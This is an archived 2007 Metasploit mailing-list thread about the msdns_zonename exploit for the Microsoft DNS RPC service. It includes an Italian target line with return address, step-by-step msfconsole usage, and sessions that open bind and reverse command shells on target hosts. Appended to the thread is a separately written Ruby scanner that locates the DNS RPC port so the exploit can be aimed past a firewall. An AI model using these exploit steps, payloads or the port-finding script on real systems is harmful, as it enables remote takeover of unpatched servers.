[framework] Exploiting the Microsoft DNS RPC service

diaul diaul at devilopers.org
Wed Apr 18 04:05:05 CDT 2007


Hi

You can simply add this target:

[ 'Windows 2000 Server SP0-SP4+ Italian', { 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],

By the way, some time ago I sent all the Windows Italian opcodes to skape, and
they are now available in the Metasploit opcode database.

Here is the msf3 session:

<CUT>

msf exploit(ms07_019_upnp) > use exploit/windows/dcerpc/msdns_zonename
msf exploit(msdns_zonename) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English
   1   Windows 2000 Server SP0-SP4+ English
   2   Windows 2000 Server SP0-SP4+ Italian
   3   Windows 2003 Server SP0 English
   4   Windows 2003 Server SP1-SP2 English


msf exploit(msdns_zonename) > set TARGET 2
TARGET => 2
msf exploit(msdns_zonename) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(msdns_zonename) > set RHOST 10.4.14.47
RHOST => 10.4.14.47
msf exploit(msdns_zonename) > exploit
[*] Started bind handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 1029
[*] Trying target Windows 2000 Server SP0-SP4+ Italian...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:10.4.14.47[0] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:10.4.14.47[0] ...
[*] Sending exploit...
[*] Error: no response from dcerpc service
[*] Command shell session 1 opened (192.168.1.80:49647 -> 10.4.14.47:4444)

Microsoft Windows 2000 [Versione 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

</CUT>

Ciao :)

diaul


Giorgio Casali wrote:
> Hi,
> is it possible to have it for the Italian version?
> Thanks
> 
> 2007/4/16, H D Moore <hdm at metasploit.com>:
> 
>     The exploit module has been merged to stable, use 'Online Update' or
>     'svn update' to grab it. The module's default target will exploit
>     Windows 2000 SP0-SP4 and Windows 2003 SP0-SP2.
> 
>     All targets are designed for the English locale. If you have a
>     non-English system, submit targets.
> 
>     The Windows 2003 SP0 target may not be reliable.
> 
>     The Windows 2003 SP1-SP2 targets will only work if hardware DEP is
>     not in use. We use the SEH overwrite method for all targets and the
>     /GS stack prevention means we will not be able to use standard
>     hardware DEP bypass techniques (return to NTDLL to disable NX).
> 
>     The RPORT option defaults to '0' and will contact the endpoint mapper of
>     the target system in order to determine the real RPC port at runtime.
>     This saves a step, but it does mean that one of port 135 or 593 needs to
>     be accessible on the target. If you are attacking a system with only
>     ports > 1025 allowed through the firewall, you will need to locate the
>     RPC service and set RPORT manually.
> 
>     To use the module, open the console interface, and run:
>     msf> use exploit/windows/dcerpc/msdns_zonename
>     msf exploit(msdns_zonename) >
>     msf exploit(msdns_zonename) > set PAYLOAD <your favorite payload>
>     msf exploit(msdns_zonename) > set <payload options>
>     msf exploit(msdns_zonename) > set RHOST <target>
>     msf exploit(msdns_zonename) > exploit
> 
>     -- example --
> 
>     < metasploit >
>     ------------
>            \   ,__,
>             \  (oo)____
>                (__)    )\
>                   ||--|| *
> 
> 
>            =[ msf v3.0
>     + -- --=[ 184 exploits - 104 payloads
>     + -- --=[ 17 encoders - 5 nops
>            =[ 33 aux
> 
>     msf > use exploit/windows/dcerpc/msdns_zonename
>     msf exploit(msdns_zonename) > set PAYLOAD windows/shell_reverse_tcp
>     PAYLOAD => windows/shell_reverse_tcp
>     msf exploit(msdns_zonename) > set LHOST 192.168.0.127
>     LHOST => 192.168.0.127
>     msf exploit(msdns_zonename) > set LPORT 4444
>     LPORT => 4444
>     msf exploit(msdns_zonename) > set RHOST 172.16.233.128
>     RHOST => 172.16.233.128
> 
>     msf exploit(msdns_zonename) > exploit
>     [*] Started reverse handler
>     [*] Connecting to the endpoint mapper service...
>     [*] Discovered Microsoft DNS Server RPC service on port 1356
>     [*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English...
>     [*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128[0] ...
>     [*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128[0] ...
>     [*] Sending exploit...
>     [*] Error: no response from dcerpc service
>     [*] Command shell session 1 opened (192.168.0.127:4444 -> 192.168.0.127:45196)
> 
>     Microsoft Windows 2000 [Version 5.00.2195]
>     (C) Copyright 1985-2000 Microsoft Corp.
> 
>     c:\>
> 
> 


-------------- next part --------------
A non-text attachment was scrubbed...
Name: msdns_zonename.rb
Type: application/x-ruby
Size: 4763 bytes
Desc: not available
Url : http://spool.metasploit.com/pipermail/framework/attachments/20070418/5b9cf130/attachment.bin 
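The quoted reply notes that RPORT defaults to 0 and asks the endpoint mapper on 135/593 for the real port, and that on a host where only ports above 1025 are reachable you must locate the DNS RPC service yourself and set RPORT by hand. The script below is an added example of that manual step; it is not code from this thread or from the msdns_zonename module. It sends a raw DCE/RPC bind for the interface UUID and version shown in the "Binding to" lines (50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0) to each port in a range and reads the answer: a bind_ack that accepts the context means the MS DNS interface is on that port, while a bind_ack carrying provider_rejection means the port speaks DCE/RPC but hosts a different interface. The default range 1025-1100, the choice to offer only the NDR v2.0 transfer syntax, and the two sample replies used for offline checking are my assumptions, not data from the page.

```ruby
#!/usr/bin/env ruby
# Raw DCE/RPC bind probe: find which TCP port hosts the Microsoft DNS Server
# RPC interface when the endpoint mapper (135/593) is firewalled.
require 'socket'
require 'timeout'

# Interface UUID and version taken from the "Binding to ..." lines in the
# msfconsole output on this page.
MSDNS_UUID    = '50abc2a4-574d-40b3-9d66-ee4fd5fba076'
MSDNS_VERSION = [5, 0]
# Standard NDR transfer syntax v2.0; the only syntax this probe offers (assumption).
NDR_UUID      = '8a885d04-1ceb-11c9-9fe8-08002b104860'
NDR_VERSION   = [2, 0]

PTYPE_BIND     = 11
PTYPE_BIND_ACK = 12
PTYPE_BIND_NAK = 13

# DCE/RPC wire form of a UUID: the first three fields are little-endian, the
# last two are copied as-is.
def uuid_to_bin(uuid)
  hex = uuid.delete('-')
  le = [hex[0, 8], hex[8, 4], hex[12, 4]].map { |h| [h].pack('H*').reverse }
  le.join + [hex[16, 16]].pack('H*')
end

# Build a 72-byte connection-oriented bind PDU with one presentation context.
def build_bind(call_id = 1)
  body = [5840, 5840, 0].pack('vvV')          # max_xmit_frag, max_recv_frag, assoc_group_id
  body << [1, 0, 0].pack('CCv')               # n_context_elem, reserved, reserved2
  body << [0, 1, 0].pack('vCC')               # p_cont_id, n_transfer_syn, reserved
  body << uuid_to_bin(MSDNS_UUID) << MSDNS_VERSION.pack('vv')   # abstract syntax
  body << uuid_to_bin(NDR_UUID) << NDR_VERSION.pack('vv')       # transfer syntax
  # Common header: rpc_vers 5.0, ptype, flags FIRST|LAST, drep (little-endian,
  # ASCII, IEEE), frag_length, auth_length, call_id.
  [5, 0, PTYPE_BIND, 0x03, 0x10, 0, 0, 0, 16 + body.bytesize, 0, call_id].pack('C8vvV') + body
end

# Classify the server's reply to our bind:
#   :bound    - bind_ack accepting the context: the MS DNS interface lives here
#   :rejected - bind_ack with provider_rejection: DCE/RPC, but not this UUID
#   :nak      - bind_nak
#   :unknown  - not a DCE/RPC v5 reply, or truncated
def classify_bind_reply(pkt)
  return :unknown if pkt.nil? || pkt.bytesize < 16 || pkt.getbyte(0) != 5
  case pkt.getbyte(2)
  when PTYPE_BIND_NAK then :nak
  when PTYPE_BIND_ACK
    # bind_ack body: max_xmit(2) max_recv(2) assoc_group(4) sec_addr_len(2) sec_addr(...)
    return :unknown if pkt.bytesize < 28
    sec_len = pkt[24, 2].unpack1('v')
    off = 26 + sec_len
    off += (4 - off % 4) % 4                  # p_result_list is 4-byte aligned
    return :unknown if pkt.bytesize < off + 6 || pkt.getbyte(off) < 1
    result = pkt[off + 4, 2].unpack1('v')     # first p_result_t: result(2) reason(2) syntax(20)
    result.zero? ? :bound : :rejected         # 0 = acceptance, 2 = provider_rejection
  else
    :unknown
  end
end

# Send one bind to host:port and classify the reply; connection failures and
# timeouts are reported as :closed.
def probe_port(host, port, timeout = 5)
  Timeout.timeout(timeout) do
    TCPSocket.open(host, port) do |s|
      s.write(build_bind)
      hdr = s.read(16).to_s
      if hdr.bytesize < 16
        :unknown
      else
        frag_len = hdr[8, 2].unpack1('v')
        classify_bind_reply(hdr + s.read([frag_len - 16, 0].max).to_s)
      end
    end
  end
rescue Errno::ECONNREFUSED, Errno::ECONNRESET, Errno::EHOSTUNREACH,
       Timeout::Error, SocketError, EOFError
  :closed
end

# Constructed sample bind_ack (not captured from a real server) so the
# classifier can be exercised offline; secondary address "1029" mirrors the
# port discovered in the session above.
def sample_bind_ack(result)
  body = [5840, 5840, 0x1234].pack('vvV')
  sec  = "1029\x00"
  body << [sec.bytesize].pack('v') << sec
  body << "\x00" * ((4 - (16 + body.bytesize) % 4) % 4)
  body << [1, 0, 0].pack('CCv')
  body << [result, result.zero? ? 0 : 1].pack('vv')    # reason 1 = abstract_syntax_not_supported
  body << uuid_to_bin(NDR_UUID) << NDR_VERSION.pack('vv')
  [5, 0, PTYPE_BIND_ACK, 0x03, 0x10, 0, 0, 0, 16 + body.bytesize, 0, 1].pack('C8vvV') + body
end

# Usage: ruby msdns_probe.rb <host> [first-last]   (default range 1025-1100)
if __FILE__ == $0 && !ARGV.empty?
  host = ARGV[0]
  first, last = (ARGV[1] || '1025-1100').split('-').map(&:to_i)
  (first..last).each do |port|
    verdict = probe_port(host, port, 3)
    next if verdict == :closed
    puts "#{host}:#{port} #{verdict}"
    puts "  -> set RPORT #{port}" if verdict == :bound
  end
end
```

The port that answers :bound is the value to give `set RPORT` before running the module with RPORT no longer 0. Each probe is a full TCP connection plus one bind, so it shows up in firewall and RPC logs; keep the range tight, and do not rely on the dynamic port staying the same after the DNS service restarts.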

